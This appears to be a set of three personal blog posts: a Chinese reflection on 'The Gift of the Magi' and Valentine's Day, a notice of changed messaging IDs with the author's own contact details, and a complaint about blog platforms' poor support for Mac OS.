想起小时候老师讲的一堂课,一对男女,为了给对方一份渴望已久的礼物,男的卖了怀表买了发卡,女的卖了头发买了表链,大家可以想象当他们打开礼物的一瞬间的心情.那个时候,老师没有告诉我们,这里面的爱情,而是告诉我们,在西方资本主义社会里面,穷人生活的是多麽的艰难.社会是如此的不公平,就好像卖火柴的小女孩,她没有过节日的选择,因为她要为生计而奔波.而现在,当我打开报纸看到中国人如此过情人节的时候,我在想,在情人节这一天,我们是不是应该想想那些没有能力,没有机会,没有选择过这个节日的同胞呢,向他们表达自己的爱意呢?
I have already change my AIM ID from ICQ ID: 145-951-836 to .Mac ID: leaskh@mac.com. And I stop using my AOL ID: lskxz. So If you have any ICQ ID, AOL ID or iChat ID(.Mac), you can connect me with my .Mac ID: leaskh@mac.com from now on.
It’s not the first time that I want to drop Live Spaces and use another blog system. But now, I really want to do this. In fact I just need a very simple public system to post my writings and my pictures. Unfortunately I can’t find a perfect one. I’ve tried so many blog systems but at last I have to disappoint. The major problem is all the blog systems can’t work well with Mac OS. So I have to remove some modules from my Live Space because this same reason. I am so sorry if you are a M$ Windows user. I done this just because I want my pages show a same effect between Windows or Mac.